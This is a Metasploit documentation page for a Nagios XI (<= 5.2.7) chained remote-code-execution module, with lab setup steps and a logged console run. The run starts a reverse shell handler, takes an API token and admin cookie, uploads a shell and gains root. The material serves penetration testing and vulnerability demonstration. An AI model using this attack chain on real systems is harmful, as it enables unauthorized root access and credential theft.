adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
8d4ee3fac6abaead438d588ea36c8feaa85af856
metasploit-gs/documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md
T
William Vu d42d9f8557 Add module docs to appease the Thao god
2016-07-01 01:17:27 -05:00

2.3 KiB
Raw Blame History

Intro

Nagios XI is the enterprise version of Nagios, the monitoring software we love and hate.

This module exploits an SQL injection, auth bypass, file upload, command injection, and privilege escalation in Nagios XI <= 5.2.7 to pop a root shell.

Setup

Download the virtual appliance:

I used the 64-bit OVA here. Remove the "-64" in the link to download the 32-bit OVA.

Import the OVA:

Just import it into VMware or VirtualBox. It should create a VM for you.

Configure the software:

When you start the VM, you will see Access Nagios XI at http://[redacted] on the login screen. Connect to the URL using your web browser and follow the steps on the screen to configure the app.

Configuration is actually not required to exploit the app, but you should do it anyway.

Usage

Just set RHOST and fire off the module! It's pretty much painless. set VERBOSE true if you want to see details.

msf > use exploit/linux/http/nagios_xi_chained_rce 
msf exploit(nagios_xi_chained_rce) > set rhost [redacted]
rhost => [redacted]
msf exploit(nagios_xi_chained_rce) > set verbose true
verbose => true
msf exploit(nagios_xi_chained_rce) > run

[*] Started reverse TCP handler on [redacted]:4444 
[*] Nagios XI version: 5.2.7
[*] Getting API token
[+] API token: 3o2erpm0
[*] Getting admin cookie
[+] Admin cookie: nagiosxi=jcilcfptj7ogpvovgs3i5gilh7;
[+] CSRF token: 477abd7db8d06ade9c7fcd9e405fd911
[*] Getting monitored host
[+] Monitored host: localhost
[*] Downloading component
[*] Uploading root shell
[*] Popping shell!
[*] Command shell session 1 opened ([redacted]:4444 -> [redacted]:60132) at 2016-07-01 00:12:20 -0500
[*] Cleaning up...
[*] rm -rf ../profile
[*] unzip -qd .. ../../../../tmp/component-profile.zip
[*] chown -R nagios:nagios ../profile
[*] rm -f ../../../../tmp/component-xAmhUGRn.zip

3904334783
TwMSxKhKEaxUjlTSNYyeICVUuPSNkwoI
cKKdfdZxRpDduZCezKXOficrVyNeVggH
mRVdstQmfdtnFiYMjLgyfvRWXyQZPyUF
dDlRoqhBvqvwrhKYWumimyKxVHSbrkoE
wjCWBTgbsQuPemhiByeMpMEhdPooHEvw
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
uname -a
Linux localhost.localdomain 2.6.32-573.22.1.el6.x86_64 #1 SMP Wed Mar 23 03:35:39 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
Reference in New Issue View Git Blame Copy Permalink